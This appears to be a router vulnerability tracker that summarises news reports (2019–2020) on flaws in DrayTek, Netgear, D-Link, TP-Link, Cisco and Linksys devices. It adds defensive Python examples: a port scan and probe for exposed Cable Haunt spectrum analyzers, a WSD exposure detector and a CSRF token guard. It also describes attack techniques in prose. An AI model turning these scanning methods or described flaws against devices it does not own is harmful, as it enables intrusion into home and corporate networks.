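Usage: fetch the index and the package over HTTPS where the repository offers it, then `verify_package Packages demo demo_1.0_all.ipk && opkg install ./demo_1.0_all.ipk` (file names are assumptions). The hash check only catches a package that differs from the index; if the index itself arrived over plain HTTP it can be swapped along with the package, which is why the transport matters as much as the check.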
Two Zero Day bugs in DrayTek routers (Updated)
A mysterious hacker group is eavesdropping on corporate email and FTP traffic
by Catalin Cimpanu of ZDNet March 28, 2020
According to Netlab, the network security division of Chinese security firm Qihoo 360, bad guys have been hacking into DrayTek routers to eavesdrop on FTP and email traffic. They first observed this in early December 2019. There are two different zero-day flaws in three DrayTek Vigor devices, the 2960, 3900 and 300B. The bugs could allow for arbitrary code execution on a vulnerable system. This could allow an attacker to eavesdrop on network traffic, operate SSH and Web based backdoors, and create system accounts. One flaw is in the login mechanism and it allows attackers to hide malicious code inside the router's username field. This malicious code can grant the hackers control over the router. Next, the attackers started recording traffic coming to port 21 (FTP), 25 (email), 110 (email) and 143 (email). These are four very old protocols and they still use plain text. It is assumed the attackers were looking for FTP and email passwords. The second flaw is in the "rtick" process and attackers used it to create backdoor accounts on the hacked routers. Qihoo says that around 100,000 vulnerable DrayTek devices are online. DrayTek issued updated firmware six days after they learned of the problem. And, DrayTek impressed me with this: "The issue only affects the Vigor3900 / 2960 / 300B and is not known to affect any other DrayTek products". This is rare; vendors usually fix only the devices with the reported problem.
Multiple flaws in multiple Netgear routers
Thousands of Netgear routers are at risk of getting hacked: What to do
by Paul Wagenseil of Toms Guide March 5, 2020
Nearly 50 Netgear devices need firmware patches ASAP. The devices are seven modem-router gateways, 40-odd routers (including some Nighthawk and Orbi models) and one range extender. The worst of the flaws lets attackers remotely install malware on one router. A "pre-authentication command injection security vulnerability" on five routers could also lead to total network takeover. For a number of the flaws Netgear has not provided specific details. Does your Netgear router need an update? Turns out, this is a hard question to answer. Netgear does a terrible job of communicating to its customers what each router's model number is. They hardly ever use the actual model number in their consumer marketing and packaging. For example, the AC4000 Nighthawk X6S Tri-Band WiFi Router is the R8000P. To find the model number, turn the device over and look at the sticker on the bottom. The update procedure differs among the various routers. The article has a full list of the buggy router model numbers.
JANUARY 2020
Millions of Internet boxes are vulnerable
Cable Haunt
by Lyrebirds ApS January 11, 2020
Bad news: untold millions of devices are vulnerable. Good news: it is not easy to exploit the bug. Bad news: despite all the headlines, it is not only modems that are vulnerable, so too are gateways (combination modem/router). Bad news: in the US, this will never be fixed. ISPs are virtual monopolies and thus have no reason to do a good job. Fixing this takes time, effort and money and very few customers will ever learn about it. I tried to get a response from Spectrum; it was a waste of time. The company that found the flaw offered a tester script for Linux that seems useless. They also offered some JavaScript that can be copied and pasted into a browser console to test if your Internet box is vulnerable. With their JavaScript, I confirmed that the Netgear CM600 modem is vulnerable. They leave out that you need to copy/paste their JavaScript as a whole, not each line individually. And, you may need to change the port number, which is why I suggest using nmap below. Netgear only offers free tech support for the first 90 days, so I can not ask them about this. Not that it matters, modem firmware can only be updated by an ISP, at least in the US.
What to do?
I suppose you could try to learn the firmware version that your modem or gateway is running and then try to find out if it has been patched for the Cable Haunt flaw. In the US, this is almost definitely a waste of time.
First, see if your Internet box uses Broadcom. If not, you are safe. The Tom's Guide article below has links to pages that show this for Arris and Netgear devices. For other companies see approvedmodems.com. If that fails, perhaps look for the technical specs of your modem or gateway. Maybe try to contact the hardware manufacturer. If Broadcom ...
If you have a router/modem combination box, run nmap on the LAN side IP address looking at all 65,535 TCP ports. If you have a router and a modem as stand-alone devices, run the same nmap against 192.168.100.1. After the nmap scan, try to use HTTP and HTTPS to access every open port. The buggy Spectrum Analyzer looks like this on a Netgear modem. Found a Spectrum Analyzer? If so, nag either your ISP or the hardware vendor for fixed software. Lotsa luck (probably won't happen). Better yet, block access to the buggy device. If it's a combination modem/router, there should be some sort of LAN side restrictions about which devices can log on to the box. For more, see the Security Checklist page here, the section on Local Administration. If you have a router and a modem as separate devices, you need a nerd to configure a defense. One option is something called a static route - some routers let you configure this, some do not. If your router supports firewall rules (rare), see my blog below about creating an outbound firewall rule to block modem access. As a rule, consumer routers, such as AmpliFi from Ubiquiti or Google WiFi, do not offer outbound firewall rules.
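As an added example (this is not code from this page, from Lyrebirds or from any vendor), here is a Python script that walks the checklist above: it pulls the open ports out of an nmap scan, builds the HTTP and HTTPS URLs to try for each one, and flags any response that looks like a spectrum analyzer page. The modem address 192.168.100.1 is the one named in the text; the nmap output is a constructed sample, and the "spectrum analyzer" text match is an assumption about what the buggy page says about itself.

```python
import re
import ssl
import urllib.request
from http.client import HTTPException
from typing import Iterable, List, Optional

MODEM_IP = "192.168.100.1"  # stand-alone modem address named in the text; use the LAN IP for a gateway

# Constructed sample of `nmap -p- -oG - 192.168.100.1` (grepable output); not a real scan.
SAMPLE_NMAP_GREPABLE = "\n".join([
    "# Nmap scan initiated as: nmap -p- -oG - 192.168.100.1",
    "Host: 192.168.100.1 ()\tStatus: Up",
    "Host: 192.168.100.1 ()\tPorts: 80/open/tcp//http///, 443/open/tcp//https///, "
    "8080/closed/tcp//http-proxy///, 8443/open/tcp//https-alt///\tIgnored State: filtered (65531)",
    "# Nmap done -- 1 IP address (1 host up) scanned",
])

OPEN_PORT_RE = re.compile(r"(\d+)/open/tcp")


def open_tcp_ports(nmap_grepable: str) -> List[int]:
    """Open TCP ports from nmap grepable (-oG) output, e.g. `nmap -p- -oG scan.txt 192.168.100.1`."""
    ports = set()
    for line in nmap_grepable.splitlines():
        if line.startswith("Host:") and "Ports:" in line:
            ports.update(int(p) for p in OPEN_PORT_RE.findall(line))
    return sorted(ports)


def candidate_urls(host: str, ports: Iterable[int]) -> List[str]:
    """The text says to try HTTP and HTTPS on every open port; this builds that list."""
    return [f"{scheme}://{host}:{port}/" for port in ports for scheme in ("http", "https")]


def looks_like_spectrum_analyzer(body: str) -> bool:
    """Heuristic (an assumption of this example): the buggy page calls itself a
    'Spectrum Analyzer', so flag any response body that mentions one."""
    return "spectrum analyzer" in body.lower().replace("-", " ")


def fetch(url: str, timeout: float = 3.0) -> Optional[str]:
    """Fetch a URL on the LAN; modems use self-signed certificates, so skip verification."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    try:
        with urllib.request.urlopen(url, timeout=timeout, context=ctx) as resp:
            return resp.read(200_000).decode("utf-8", "replace")
    except (OSError, HTTPException, ValueError):  # refused, timed out, TLS or protocol failure, bad URL
        return None


def find_spectrum_analyzer(host: str, ports: Iterable[int]) -> List[str]:
    """URLs on `host` whose response looks like the spectrum analyzer described above."""
    hits = []
    for url in candidate_urls(host, ports):
        body = fetch(url)
        if body is not None and looks_like_spectrum_analyzer(body):
            hits.append(url)
    return hits


if __name__ == "__main__":
    # Offline demo on the constructed scan. For a real check, feed the file written by
    # `nmap -p- -oG scan.txt 192.168.100.1` to open_tcp_ports() instead.
    ports = open_tcp_ports(SAMPLE_NMAP_GREPABLE)
    print("open TCP ports:", ports)
    print("spectrum analyzer found at:", find_spectrum_analyzer(MODEM_IP, ports))
```

A hit only tells you the interface is reachable from the LAN, which is the condition the text says to fix by restricting LAN-side access, a static route or an outbound firewall rule; it does not prove the firmware is the vulnerable Broadcom build.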
DECEMBER 2019
Multiple bugs in Ruckus Access Points
A ton of Ruckus Wireless routers are vulnerable to hackers
by Zack Whittaker of TechCrunch December 28, 2019
Despite the headline, the buggy devices are Access Points not routers. Security researcher Gal Zror discovered 10 bugs in Ruckus devices. Three are biggies. They are in the web interface of the Unleashed line of APs. The flaws let a bad guy take complete control of a vulnerable router remotely and without needing a password. As bad as bad gets.
Patches have been issued but the routers do not self-update. Ruckus Cloud access points are not buggy. Neither are their SmartZone-enabled devices. This was made public at a presentation at the 36th Chaos Communication Congress called Lecture: Don't Ruck Us Too Hard - Owning Ruckus AP Devices. This surprised me. For one, it's the first mention of Ruckus in my list of bugs. Second, Ruckus is a high end company. Then again, Cisco is also high end and their software has a terrible track record when it comes to bugs and flaws and vulnerabilities.
More buggy D-Link routers
D-Link DIR-859 — Unauthenticated RCE (CVE-2019-17621)
by Miguel Méndez Z. December 24, 2019
Back in Oct. 2019, we learned of a Remote Code Execution bug in a single D-Link router, the DIR-859 (CVE-2019-17621). The bug could be exploited by anyone on the LAN to take full control of the router. Of course, many routers from the same company share the same firmware (operating system) so it was not a surprise when, in Nov. 2019, we learned that many more D-Link routers share the same bug. Some of the buggy routers are too old and will not be updated. Some have already had fixes released. Still more are slated to have fixes released soon. These are the buggy models: DIR-818Lx, DIR-822, DIR-823, DIR-859, DIR-865L, DIR-868L, DIR-869, DIR-880L, DIR-890, DIR-885, DIR-895. In some cases, the router firmware must be updated twice. Ugh. The vulnerability is in the code used to manage UPnP requests.
Four buggy TP-Link routers
TP-Link Archer Router Vulnerability Voids Admin Password, Can Allow Remote Takeover
by Grzegorz Wypych and Limor Kessem of IBM X-Force Red December 16, 2019
There are critical bugs in the TP-Link Archer C5 v4, Archer MR200v4, Archer MR400v3 and the MR6400v4. Are other TP-Link routers safe? Don't know. No one said anything about other routers having been tested. The bug lets a bad guy take full admin control of the router. First, the bad guy has to trick the router as to the source of a login request. This is not hard. Then, the bad guy simply has to provide a password that is the wrong length. If the password is too short, it locks out access to the router. If the password is too long, it voids the current password letting the bad guy login without a password. TP-Link never fails to impress. Firmware updates are available. However, as the article below by Paul Wagenseil details, the firmware update process is miserable. The Archer MR200, MR400 and MR6400 are LTE-based routers sold in the European Union. The Archer C5 AC1200 is a home Wi-Fi router, sold in many countries.
NOVEMBER 2019
More buggy D-Link routers that will not be fixed
D-Link Adds More Buggy Router Models to 'Won’t Fix' List
by Tom Spring of ThreatPost November 19, 2019
A new bug in D-Link routers will not be fixed because the routers are too old to bother with (they are End-of-Life or EoL). The bug allows a bad guy, who does not know any passwords, to access the web configuration interface of the router. The buggy devices are: DIR-866, DIR-655, DHP-1565, DIR-652, DAP-1533, DGL-5500, DIR-130, DIR-330, DIR-615, DIR-825, DIR-835, DIR-855L, and DIR-862. D-Link suggests disabling remote administration, resetting the affected routers and using a complicated router password.
It is not clear if this bug is similar to the bug (CVE-2019-16920) that FortiGuard Labs reported last month. That bug impacted 10 of the same routers. Spring puts this bug in perspective, noting a long history of bugs in D-Link routers. A September 2019 bug can leak passwords. A May 2019 bug allowed DNS hijacking. In 2017, we learned that the D-Link DIR-130 was one of 25 routers that could be exploited by the CIA. Also in 2017, the 850L and AC1200 had multiple vulnerabilities that could allow a hacker to gain remote access and control of the device.
Zero Day flaw in the D-Link DIR-878 router. Others too?
Tianfu Cup Round-Up: Safari, Chrome, D-Link Routers and Office 365 Successfully Hacked
by Elizabeth Montalbano of ThreatPost November 18, 2019
Hackers, at the annual Tianfu Cup gathering over the weekend, successfully compromised the D-Link DIR-878 router using a zero-day vulnerability. Note the plural use of the word hackers. The router was hacked by seven, yes, seven, different groups. It has been a few days and, so far, no response from D-Link on their security bulletin page. Will they acknowledge the flaw? Will they fix it? Time will tell. The bigger picture, however, involves other D-Link routers. It is likely that other similar routers share the same buggy software. And, some recent history: in March 2019 the German Federal Office for Information and Security (BSI) issued a warning about bugs in the DIR-878 and the DIR-825. The bugs are easily exploited and let attackers bypass the logon processes and execute malicious code.
OCTOBER 2019
Ten D-Link routers that should be thrown away
Multiple D-Link routers vulnerable to remote command execution
by US Cert October 23, 2019
These 10 D-Link routers are buggy, will not be fixed and should be thrown away: DIR-655, DIR-866L, DIR-652, DHP-1565, DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 and the DIR-825. A remote, unauthenticated attacker may be able to execute commands with root privileges on a buggy router. This can happen as the result of viewing a specially-crafted web page. The bug was publicly disclosed by Fortinet's FortiGuard Labs, same as below. This appears to be the same bug as below; it has just been found in six more routers.
D-Link won't fix bugs in four of its routers
D-Link Won't Fix Serious Security Flaw on Four Wi-Fi Routers
by Paul Wagenseil of Tom's Guide October 8, 2019
Beware the D-Link DIR-652, DIR-655, DIR-866L and DHP-1565 routers. They have critical bugs. An attacker halfway across the world could hijack these routers without needing a password. Everyone suggests throwing these routers away. I agree. End of Life is the techie term for the computing devices that are too old to bother with. As Seinfeld might have said: No bug fixes for you! Manufacturers win twice with routers that are deemed EoL: they don't have to spend money fixing bugs and they motivate customers to buy new routers. Usually EoL devices are no longer sold. Not so with D-Link. Three of them can still be bought new from third-party sellers on Amazon's U.S. website. Is the same bug in any other D-Link routers? None of our business. Fortinet, which found the bug, does not say which or how many routers they tested. And, the D-Link response is limited to these four routers with no mention of any others.
SEPTEMBER 2019
Bugs Bugs Bugs - 125 in all
SOHOpelessly Broken 2.0
by Independent Security Evaluators September 16, 2019
My summary is on the News page.
Here we go again - another LAN side protocol available on WAN
Protocol used by 630,000 devices can be abused for devastating DDoS attacks
by Catalin Cimpanu of ZDNet August 27, 2019
Just as with UPnP all those years ago, routers (and IoT devices) are exposing a protocol meant exclusively for LAN-side use to the Internet at large. This time the protocol is WSD (a.k.a. WS-Discovery and Web Services Dynamic Discovery). Bad guys abuse WSD to create DDoS attacks. WSD listens on UDP port 3702 (some articles also referenced TCP port 3702). Like UPnP, WSD is a protocol for LAN side devices to discover each other and their capabilities. Is there a printer in the house? WSD communication starts with requests to the IPv4 multicast address 239.255.255.250. IPv6 uses FF02::C (link-local scope). Being exposed to the WAN is only one bug, the other is that devices should only respond to requests to these two IP addresses. WSD responses sometimes come from port 3702, sometimes from random high numbered ports. Akamai noted that most vulnerable devices were CCTV cameras and DVR systems. No article said anything about the failure of the routers to block these vulnerable devices. UPnP haunts us still.
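The paragraph above names the two failures: WSD reachable from the WAN, and devices answering probes that were not sent to the discovery multicast address. As an added example (not from the ZDNet article, Akamai or any vendor), the Python below encodes both as defender-side checks: the rule a WSD responder should apply before answering a probe, and a detection pass over firewall log lines that flags UDP/3702 traffic arriving from outside private address space. The netfilter-style log format and the IP addresses in it are constructed for this example.

```python
import ipaddress
import re
from typing import List

WSD_PORT = 3702
# Discovery multicast addresses named in the text: IPv4 239.255.255.250 and IPv6 FF02::C.
WSD_MULTICAST = {ipaddress.ip_address("239.255.255.250"), ipaddress.ip_address("ff02::c")}
# Ranges a LAN-only protocol should ever hear from: RFC 1918 plus IPv6 link-local and ULA.
LAN_RANGES = [ipaddress.ip_network(n) for n in
              ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "fe80::/10", "fc00::/7")]


def is_lan_address(addr: str) -> bool:
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in LAN_RANGES)  # version mismatch simply yields False


def should_answer_probe(src: str, dst: str, dport: int) -> bool:
    """Rule a WSD responder should apply: answer only a probe that arrived on the WSD
    port, addressed to the discovery multicast group (never to the unicast address),
    from a LAN source. Unicast or Internet-sourced probes are the DDoS abuse path."""
    return (dport == WSD_PORT
            and ipaddress.ip_address(dst) in WSD_MULTICAST
            and is_lan_address(src))


# Constructed firewall log lines in iptables LOG style; not from the article.
SAMPLE_LOG = "\n".join([
    "Aug 27 09:12:01 gw kernel: [WAN-IN] IN=eth0 OUT= SRC=203.0.113.7 DST=198.51.100.20 PROTO=UDP SPT=51000 DPT=3702 LEN=200",
    "Aug 27 09:12:02 gw kernel: [WAN-IN] IN=eth0 OUT= SRC=203.0.113.7 DST=198.51.100.20 PROTO=TCP SPT=51001 DPT=443 LEN=60",
    "Aug 27 09:12:05 gw kernel: [LAN-IN] IN=br0 OUT= SRC=192.168.1.23 DST=239.255.255.250 PROTO=UDP SPT=49152 DPT=3702 LEN=600",
    "Aug 27 09:12:09 gw kernel: [WAN-IN] IN=eth0 OUT= SRC=198.18.0.9 DST=198.51.100.20 PROTO=UDP SPT=3702 DPT=3702 LEN=180",
])
FIELD_RE = re.compile(r"(SRC|DST|PROTO|DPT)=(\S+)")


def wsd_from_internet(log_text: str) -> List[str]:
    """SRC addresses of UDP/3702 packets that reached the router from outside the LAN.
    Any hit means WSD is exposed on (or being let in from) the WAN and the router
    should be dropping that traffic."""
    hits = []
    for line in log_text.splitlines():
        fields = dict(FIELD_RE.findall(line))
        if (fields.get("PROTO") == "UDP"
                and fields.get("DPT") == str(WSD_PORT)
                and "SRC" in fields
                and not is_lan_address(fields["SRC"])):
            hits.append(fields["SRC"])
    return hits


if __name__ == "__main__":
    print("LAN multicast probe answered:", should_answer_probe("192.168.1.23", "239.255.255.250", 3702))
    print("unicast probe answered:", should_answer_probe("192.168.1.23", "192.168.1.5", 3702))
    print("Internet WSD sources seen:", wsd_from_internet(SAMPLE_LOG))
```

The second line of the sample log is ordinary HTTPS and the third is a legitimate LAN-side multicast probe; only the two WAN-side UDP/3702 packets are reported, which is exactly the traffic a consumer router should have blocked in the first place.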
AUGUST 2019
Four router vendors refuse to fix bugs
Cross-Router Covert Channels
by Adar Ovadya, Rom Ogen, Yakov Mallah, Niv Gilboa and Yossi Oren of Ben-Gurion University August 2019
Researchers at Ben-Gurion University found multiple ways to communicate between the two Wi-Fi networks typically offered by a router. They refer to these two networks as Host and Guest, most people refer to them as Private and Guest. The research was presented at the 13th USENIX Workshop on Offensive Technologies (WOOT). They tested routers from TP-Link, D-Link, Edimax and Linksys and all the companies refused to fix anything. Quoting: "We sent a draft of our findings to the manufacturers of the routers ... during May 2019. During June 2019 the Belkin/Linksys security response team notified us that they do not intend to fix the vulnerability we disclosed. None of the other router vendors responded to our disclosure". As I say elsewhere on this site, don't use a consumer router.
The bugs are pretty obscure. For example, on some routers, a DHCP NAK from one network is erroneously sent to the other network, which can be used to send a small amount of data to the other network. They also discovered that quickly joining and leaving an IGMP group from the Private network caused an IGMP Membership Query packet to be sent to both the Private and Guest networks. This too can be used to transfer data between the two networks. There were also some timing attacks.
Bugs found in multiple 4G Hotspots
Reverse Engineering 4G Hotspots for fun, bugs and net financial loss
by G Richter of Pen Test Partners August 10, 2019
A 4G hotspot is a router. The biggest difference is that it connects to the Internet via 4G rather than an Ethernet cable. Pen Test Partners found multiple vulnerabilities in several well-known vendors' Mi-Fi devices, including pre- and post-auth command injection and code execution. The vendors involved were generally poor at responding to disclosure attempts. ZTE was the worst; they responded that a device was end of life, so the bugs would not be fixed ... yet they were still selling it from their own online store! They also found bugs in Netgear and TP-Link devices.
JUNE 2019
Critical bugs in four TP-Link Wi-Fi Range Extenders
Critical RCE Vulnerability in TP-Link Wi-Fi Extenders Can Grant Attackers Remote Control
by Grzegorz Wypych of Security Intelligence June 18, 2019
Four TP-Link Wi-Fi extenders have a critical remote code execution (RCE) vulnerability. The bug lets a remote attacker get complete control over the device. The attacker does not need to login or authenticate to the device to exploit the bug. The problem is triggered with a malformed user agent field in HTTP headers. The buggy devices are the RE365 (sold in Europe), the RE650 (sold in the US, UK and Canada), the RE350 (same 3 countries) and the RE500 (sold in the US and Canada). Patches have been issued but device owners have to manually download them and install them. First, they have to ensure the correct hardware version for the available firmware, then they have to get the firmware for their country. All processes on these devices run with root-level access, which is just asking for trouble.
Still another critical bug in Cisco software
Cisco IOS XE Software Receives Fix Against High-Severity Flaw
by Ionut Ilascu of Bleeping Computer June 13, 2019
Far too much of this web page is devoted to bugs in Cisco software. They just released an updated version of their IOS XE operating system to patch a high severity bug - insufficient cross-site request forgery (CSRF) protections in the web-based user interface of the software. The bug can be exploited by an unauthenticated, remote attacker who could persuade an already logged in user of the web interface to follow a malicious link. The link could then perform arbitrary actions with the privilege level of the victimized user. If the victim is an administrator, bad guys could modify the configuration, run commands and even reload a vulnerable device. The good news is that a victim has to be logged in to the system before they can be exploited. Also, exploitation requires the HTTP Server feature to be active and it is not always active by default (this is version dependent).
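The CSRF attack described above works because the web UI accepts a state-changing request on the strength of the victim's session cookie alone. As an added example (not Cisco's code and not from the Bleeping Computer article), the Python below shows what "sufficient" CSRF protection looks like: a per-session synchronizer token that the UI embeds in its own forms, checked with a constant-time comparison before any privileged action such as a reload runs. A page the victim is lured to cannot read that token, so its forged request fails. The session store, request shape and status strings are constructed for the example.

```python
import hmac
import secrets
from typing import Dict, Optional, Tuple


class CsrfGuard:
    """Issues one unguessable token per login session and validates it on submit."""

    def __init__(self) -> None:
        self._tokens: Dict[str, str] = {}  # session id -> csrf token

    def issue(self, session_id: str) -> str:
        """Token the UI embeds in its forms; stable for the life of the session."""
        token = self._tokens.get(session_id)
        if token is None:
            token = secrets.token_urlsafe(32)
            self._tokens[session_id] = token
        return token

    def is_valid(self, session_id: str, presented: Optional[str]) -> bool:
        expected = self._tokens.get(session_id)
        if expected is None or presented is None:
            return False
        return hmac.compare_digest(expected, presented)  # constant-time compare

    def revoke(self, session_id: str) -> None:
        """Call on logout so an old token can never be replayed."""
        self._tokens.pop(session_id, None)


def handle_reload(guard: CsrfGuard, request: dict) -> str:
    """Constructed handler for a privileged action (reload the device). `request`
    carries the session cookie the browser attached automatically, the method,
    and the form fields. Returns a constructed HTTP status line."""
    if request["method"] != "POST":
        return "405 Method Not Allowed"  # a bare link (GET) must never change state
    if not guard.is_valid(request["cookie_session"], request["form"].get("csrf_token")):
        return "403 Forbidden"  # token missing or wrong: treat as forged
    return "200 OK: reload scheduled"


def scenario() -> Tuple[str, str, str]:
    """Replay the attack from the text against the guarded handler.
    An admin is logged in (session 'admin-1'); their browser attaches that cookie to
    every request to the device, including ones an attacker's page triggers."""
    guard = CsrfGuard()
    token = guard.issue("admin-1")  # rendered into the device's own reload form
    # 1. Attacker's page makes the victim's browser follow a link: GET, no token.
    via_link = handle_reload(guard, {"method": "GET", "cookie_session": "admin-1", "form": {}})
    # 2. Attacker's page auto-submits a hidden POST form: right cookie, no token.
    via_form = handle_reload(guard, {"method": "POST", "cookie_session": "admin-1", "form": {}})
    # 3. The admin submits the device's real form, which carries the token.
    legit = handle_reload(guard, {"method": "POST", "cookie_session": "admin-1",
                                  "form": {"csrf_token": token}})
    return via_link, via_form, legit


if __name__ == "__main__":
    for outcome in scenario():
        print(outcome)
```

Only the third request succeeds. Marking the session cookie SameSite and requiring a re-login for destructive actions add defence in depth, but the token check is the piece whose absence the advisory calls "insufficient cross-site request forgery protections".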
MAY 2019
Cisco screws up for the millionth time
Thrangrycat by Red Balloon Security May 21, 2019
Take a look at the bugs tracked on this site. Lots of Cisco issues over the last few years. Paraphrasing Red Balloon: There are two bugs that affect about 150 different Cisco devices. The first, known as Thrangrycat, allows an attacker to fully bypass the Trust Anchor module (TAm) via Field Programmable Gate Array (FPGA) bitstream manipulation. This is due to multiple hardware design flaws in the TAm. The second is a remote command injection vulnerability against IOS XE version 16 that allows remote code execution as root. By chaining these, an attacker can remotely and persistently bypass Cisco’s secure boot mechanism and lock out all future software updates to the TAm.
The TAm is a proprietary Cisco hardware security module. It is the root of trust that underpins all other Cisco security mechanisms. Thrangrycat allows an attacker to make persistent modification to the TAm, thereby defeating the secure boot process and invalidating the chain of trust at its root. While the flaws are based in hardware, they can be exploited remotely. Since the flaws involve the design of the hardware, it is unlikely that any software patch will fully resolve the fundamental issues. Cisco released a patch for IOS XE and provided the Cisco IOS Software Checker to identify vulnerabilities in Cisco IOS and IOS XE. Cisco is working on patches for Thrangrycat, but notes that the patch will not be a straightforward update for most devices but instead will require "on-premise[s] reprogramming of a low-level hardware component." Patches for many routers, switches and network interface modules will be released between May 2019 and November 2019. As for detection and mitigation, Red Balloon will present this in a talk at BlackHat USA 2019.
TP-Link publicly shamed
Thousands of vulnerable TP-Link routers at risk of remote hijack
by Zack Whittaker of TechCrunch May 22, 2019
Thousands of TP-Link routers are vulnerable to a bug, and it took more than a year for TP-Link to publish the patches on its website. They created the patches, they just didn't publish them. The bug lets a low-skilled attacker get full remote access to a vulnerable router. The bug was first disclosed to TP-Link in October 2017. Shortly thereafter, they released a patch for the WR940N router. But, the WR740N was vulnerable to the same bug and no patch was released for it. TP-Link was warned about this in January 2018, yet ... nothing until they were publicly shamed by TechCrunch.
Linksys found to be both incompetent and unconcerned with security
Over 25,000 Linksys Smart Wi-Fi routers vulnerable to sensitive information disclosure flaw
by Troy Mursch May 13, 2019
Thirty-three Linksys routers are buggy and Linksys will not fix it. They tried to fix it five years ago, but they screwed that up. Yet another confirmation of the opinion I offered on this site from the get-go back in 2015 - avoid consumer routers. The flaw affects Linksys Smart Wi-Fi routers. It allows unauthenticated remote access to sensitive information and it's easily exploited by bad guys with little technical knowledge. The routers leak information both about themselves and about every (yes, every) device that has ever connected to them. For connected devices, Linksys always leaks the MAC address, Device name ("TROY-PC") and Operating system. Sometimes it also leaks the device type, model number, and a description of the attached device. As for router information, it leaks the model number, hardware version, serial number, firmware release level, MAC address, the LAN side IP address, WAN settings, firewall status and DDNS settings. Leaking the MAC address lets bad guys determine the physical location of the router. Data provided by BinaryEdge shows that 25,617 Linksys Smart Wi-Fi routers are currently leaking sensitive information to the public. Among the 33 buggy models are the E4200, EA2700, EA5800, EA6900, EA7300, EA8500, EA9200, WRT1900AC, WRT3200ACM, XAC1900 and WHW03 Velop. The full list is here. This is yet another in a long line of HNAP bugs. The bug can also reveal if a router is using the default password (thousands are) without even trying to login. The worst part is that Linksys tried to fix this five years ago but clearly screwed that up. Then, when contacted about it recently, they had no interest in fixing it properly. Yes, if you disable remote web access you block the information leak. However, Linksys Smart Wi-Fi routers require remote access for the Linksys App to function.
APRIL 2019
29 new Cisco Bugs
Cisco warns over critical router flaw
by Liam Tung of ZDNet April 18, 2019
Cisco has disclosed 29 new vulnerabilities, 5, 6 or 7 of which are doozies. It's too much for tech reporters to digest. One of the critical bugs is in the ASR9000 Series Aggregation Services Routers. The bug is as bad as bad gets; it can be exploited remotely by a bad guy without a password. There is a patch and a workaround. The other critical bugs affect Cisco Wireless LAN Controller software. Another bug is in the Cisco Expressway Series and Cisco TelePresence Video Communication Server. Another biggie is in Cisco Aironet Series Access Points. Finally, there is a critical bug in the Cisco Cluster Management Protocol code in Cisco IOS and Cisco IOS XE. As with the first bug, a remote bad guy without a password can obtain full control of vulnerable devices. If the devices accept Telnet connections, a bad guy who sends malformed Telnet options while establishing a connection can execute arbitrary code.
The Threatpost article below offers some context, noting that earlier this month, Cisco re-patched flaws for two high-severity bugs after their first attempt was botched. And, they reported two new router bugs with no fixes or workarounds. Just what you want in a router vendor.
TP-Link, yet again
Buffer Overflow Vulnerability in TP-Link Routers Can Allow Remote Attackers to Take Control
by Grzegorz Wypych and Limor Kessem of IBM Security Intelligence April 8, 2019
There is a buffer overflow flaw in the TP-Link TL-WR940N and TL-WR941ND routers. No other models were tested, so it is likely that others in the same family are vulnerable too. These models are old (they are 300Mbps Wi-Fi N) and have been discontinued. The bug allows bad guys to take control of the device from a remote location. Sounds worse than it is. You have to already be logged on to the web interface to exploit the flaw. And, the flaw is in the web interface, so if Remote Administration is disabled, as it often is, then it can not be exploited from overseas. TP-Link issued patches. Why are so many of these reports about ancient routers? Perhaps because if you break a $30 router while hacking it, no big deal.
Three bugs in a Verizon FIOS router
Verizon Fios Quantum Gateway Routers Patched for Multiple Vulnerabilities
by Tenable Research April 9, 2019
Tenable has discovered 3 vulnerabilities in the Verizon Fios G1100 Quantum gateway/router. A Command Injection flaw can only be exploited by a user already logged on to the device. It is exploitable from the LAN side and remotely if Remote Administration is enabled. Because HTTPS is not enforced in the web interface, an attacker on the LAN side can intercept login requests using a packet sniffer and then replay the requests to get admin access to the web interface of the router. Packet sniffing a login request also provides a salted password hash (SHA-512). An unauthenticated attacker can retrieve the password salt simply by visiting a URL in a web browser. Thus, an attacker could perform an offline dictionary attack to recover the original password. Of course, the focus on passwords is because insecure firmware, like this, always uses the same userid. By now, most Verizon FIOS customers should have the updated firmware. If you have a G1100 you should verify this. The real lesson here is to not use hardware from an ISP. See the Disclosure Timeline in the first article below and judge the Verizon response for yourself.
MARCH 2019
TP-Link ignores a security problem
TP-Link 'smart' router proves to be anything but smart - just like its maker: Zero-day vuln dropped after silence
by Thomas Claburn of The Register March 28, 2019
90 days ago Matthew Garrett, a Google employee, informed TP-Link of a bug in their all-in-one SR20 Smart Home Router. TP-Link ignored the problem. To me, this is the more important issue, much more interesting than the bug itself. Garrett wrote: "I reported this to TP-Link in December via their security disclosure form, a process that was made difficult by the "Detailed description" field being limited to 500 characters. The page informed me that I'd hear back within three business days - a couple of weeks later, with no response, I tweeted at them asking for a contact and heard nothing back." The SR20 is a combination Zigbee/ZWave hub and router. Ignoring security problems is one of three mistakes TP-Link made. They also ship devices with debug daemons, software intended for testing, that does not belong in a released product.
The software is the TP-Link Device Debug Protocol (TDDP) and it has had multiple vulnerabilities in the past. This bug allows arbitrary command execution, as root, without authentication, from devices on the LAN. TDDP listens on the WAN side too, but the default firewall configuration blocks it there. To better control access to the router from LAN-side devices see the Local Administration section of my security checklist. Garrett also said that @CoreSecurity had the same experience when they reported TDDP flaws.
FEBRUARY 2019
Bugs in two D-Link routers found by the BSI in Germany
D-Link investigates router vulnerability after German security agency warning
by CET news March 1, 2019
D-Link is investigating bugs in the DIR-825 and DIR-878 after a warning from the German Federal Office for Information and Security (BSI).
The BSI assigned a severity rating of "high". The bugs allow attackers to bypass the logon processes and execute malicious code. The bugs are easily exploited.
The DIR-825 got its last update in 2015, the DIR-878 was last updated in August 2018. My guess (time will tell) is that these bugs will not be fixed.
JANUARY 2019
Can Cisco be trusted?
Multiple vulnerabilities in Cisco Identity Services Engine (Unauth XSS to RCE as root)
by Pedro Ribeiro of Agile Information Security and Dominik Czarnota First published Jan 20, 2019, Last Updated Feb 5, 2019
